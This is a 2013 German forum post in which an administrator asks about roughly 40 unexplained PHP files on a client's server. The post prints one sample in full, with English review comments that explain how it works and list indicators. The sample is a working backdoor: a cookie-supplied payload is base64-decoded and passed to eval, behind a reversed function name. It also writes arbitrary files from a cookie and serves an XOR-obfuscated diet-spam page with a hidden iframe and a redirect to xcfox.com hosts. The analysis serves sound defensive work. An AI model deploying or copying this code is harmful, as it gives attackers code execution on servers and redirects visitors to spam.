Suspekte PHP-Dateien auf Server
Verfasst: 05.08.2013, 06:19
Bei einem Kunden habe ich am Server ca. 40 gleiche, aber verschieden genannte PHP-Dateien gefunden, welche mir ziemlich suspekt erscheinen, insbesondere, weil niemand weiß, wie die dorthin gekommen sind.
Ich habe eine davon unten eingestellt, kann mir wer sagen, was das ist?
<?php
// NOTE(review): captured malicious sample. The statements are left byte-for-byte
// unchanged so they can be matched against copies found on disk.
//
// Backdoor: if the request carries a cookie named 'ggm', its value is
// base64-decoded and handed to eval().
//  - strrev("edoced_4"."6esab") evaluates to "base64_decode"; the name is stored
//    reversed and split in two, so a plain-text search for "base64_decode" does
//    not hit this line. Searching for eval( next to $_COOKIE, or for the cookie
//    names 'ggm' / 'ggn' / 'ggp', does.
//  - Output of the evaluated code is captured (ob_start) and discarded from the
//    response body (ob_end_clean). It is returned base64-encoded in a Set-Cookie
//    header instead: cookie name taken from 'ggn', value wrapped on both sides in
//    the value of 'ggp'.
//  - Everything travels in Cookie / Set-Cookie headers, which common access-log
//    formats usually do not record -- TODO confirm against this server's logging.
// Risk: arbitrary PHP execution with the rights of the web server's PHP process.
// A host that served this file should be treated as compromised; deleting the
// file does not undo anything that was executed through it.
if(isset($_COOKIE['ggm'])){ob_start();$b=strrev("edoced_4"."6esab");eval($b($_COOKIE['ggm']));setcookie($_COOKIE['ggn'],$_COOKIE['ggp'].base64_encode(ob_get_contents()).$_COOKIE['ggp']);ob_end_clean();}
// Writes the raw value of cookie 'f' to "f.txt" (relative path, so it is resolved
// against the current working directory), replacing any earlier content. The
// value is not validated. What the file is used for cannot be told from this
// listing; an unexplained f.txt next to a script is an indicator worth checking.
if(isset($_COOKIE['f'])){ file_put_contents("f.txt", $_COOKIE['f']); }
// If the query parameter 'i' is present (its value is never read), streams
// ./foxlogo.jpg as image/jpeg and stops. The og:image URL emitted by the template
// below points back at this script with ?i=<random>.jpg, so this branch is what
// serves the preview image. The fopen() result is not checked.
if(isset($_GET['i'])){ $name = './foxlogo.jpg'; $fp = fopen($name, 'rb'); header("Content-Type: image/jpeg"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; }
/**
 * Builds a string of $length characters drawn from a-z, A-Z and 0-9.
 *
 * Characters are picked with rand(), which is not a cryptographically secure
 * generator. In this file the result is only used for throw-away names (an
 * image file name, element ids, a JavaScript function name), which makes the
 * generated markup differ between requests -- presumably to hinder static
 * signatures on the page; not confirmable from this listing.
 *
 * @param int $length Number of characters to generate; 0 or less yields "".
 * @return string The generated string.
 */
function rand_string( $length ) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$size = strlen( $chars );
$str = "";
for( $i = 0; $i < $length; $i++ ) {
// one uniformly indexed pick from the 62-character alphabet per iteration
$str .= $chars[ rand( 0, $size - 1 ) ];
}
return $str;
}
// Path segment used only to build $img_link below.
$prefix="m";
// Pool of page titles (diet-product advertising copy); one is chosen at random
// per request and printed in <title> and og:title.
$titles = array("Lose 1-2 Pounds Daily! Permanently!","No Hunger Pains, Maintain Muscle Tone, Feel Great!","Equally as Effective as Clinical Injections. Save Money & NO Pain!","Made in the USA! FDA Compliant! All Natural & Completely Safe!","Raspberry Ultra is YOUR Solution! Guaranteed Results!","America Top Diet Trends","The best Diet","Top Diet");
$title = $titles[array_rand($titles)];
// Builds http://<Host header>/m/<10 random chars>.jpg. $img_link is not
// referenced anywhere else in the visible listing. HTTP_HOST is taken from the
// request and is therefore client-controlled.
$img_link = "http://".$_SERVER["HTTP_HOST"]."/".$prefix."/".rand_string(10).".jpg";
// Pool of short "please wait" texts; one is shown (after XOR decoding in the
// browser) while the redirect timer runs.
$waits = array("Wait please...", "Open...", "........", "1 second!","...","Please, wait!");
$wait = $waits[array_rand($waits)];
/**
 * Obfuscates $text by XOR-ing every byte with $xorKey and percent-encoding
 * the result with rawurlencode().
 *
 * This is the server-side half of a pair: the inline JavaScript function in
 * the template below reverses it (decodeURIComponent, XOR with the same key,
 * document.write). A single-byte XOR is obfuscation, not encryption -- the key
 * is printed in clear in that script ("var key="), so the hidden markup can be
 * recovered from any saved copy of the response.
 *
 * @param string $text   Text to obfuscate.
 * @param int    $xorKey Key applied to each byte; the caller passes rand(1,99).
 * @return string Percent-encoded XOR result.
 */
function xo( $text, $xorKey ) {
$xored = '';
$chars = str_split( $text );
$i = 0;
while ( $i < count( $chars ) ) {
// XOR the byte value with the key and append the resulting byte
$xored .= chr( ord( $chars[$i] ) ^ $xorKey );
$i++;
}
return rawurlencode($xored);
}
// Per-request name of the JavaScript decoder function: "a" plus five random
// characters, so the function name differs on every response.
$magickword = "a".rand_string(5);
// Per-request XOR key (1..99) shared by xo() and the JavaScript decoder.
$x=rand(1,99);
// Invisible 1x1 iframe loading a bit.ly short link. What the link is for is not
// visible here -- presumably hit counting via the shortener's statistics; verify.
$bitly="<iframe src='http://bit.ly/W2HpQg' width='1' height='1' frameborder='0'></iframe>";
// Script that sends the browser, after 200 ms, to one of five numbered
// sub-hosts under xcfox.com (rand(1,5)) with the query string ?s=daidu16.
// The host name and the "s" value are usable as network indicators in proxy
// and DNS logs.
$redir = "<script>function delayer(){window.location = 'http://best.diet.news.2013.for.lose.".rand(1,5).".pound.xcfox.com/?s=daidu16'}; setTimeout('delayer()', 200);</script>";
// Template that follows:
//  - <title> and Open Graph tags (og:title, og:url, og:site_name, og:image)
//    describe the page for link previews; og:image points back at this script
//    with ?i=<random>.jpg, which the 'i' branch near the top of the file answers.
//  - $_SERVER["HTTP_HOST"] and $_SERVER["SCRIPT_NAME"] are echoed into attribute
//    values without escaping; HTTP_HOST comes from the request's Host header.
//  - The inline script defines the decoder (named by $magickword, key $x) that
//    reverses xo() and writes the result into the document.
//  - The wait text, the iframe and the redirect script appear in the HTML source
//    only in XOR/percent-encoded form and become markup in the browser, so a
//    scan of the served HTML for the iframe or redirect URL finds nothing.
//  - The body and h1 ids are 50 random characters each, different per request.
?><!DOCTYPE HTML>
<html><head><title><?php echo $title; ?></title>
<meta property="og:title" content="<?php echo $title; ?>"/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="<?php echo "http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"] ?>"/>
<meta property="og:site_name" content="<?php echo $_SERVER["HTTP_HOST"] ?>"/>
<meta property="og:image" content="<?php echo "http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?i=".rand_string(10).".jpg" ?>"/>
<script>function <?= $magickword ?>(s) { var key=<?= $x ?>; var str = decodeURIComponent(s); var xored = ""; for (i=0; i<str.length;i++) { var a = str.charCodeAt(i); var b = a ^ key; xored = xored+String.fromCharCode(b); } document.write(xored); return xored; };
</script>
</head><body id="<?= rand_string(50) ?>" >
<h1 id="<?= rand_string(50) ?>"><script><?= $magickword ?>('<?= xo( $wait, $x ) ?>');</script></h1>
<script><?= $magickword ?>('<?= xo( $bitly, $x ) ?>');</script><script><?= $magickword ?>('<?= xo( $redir, $x ) ?>');</script></body></html>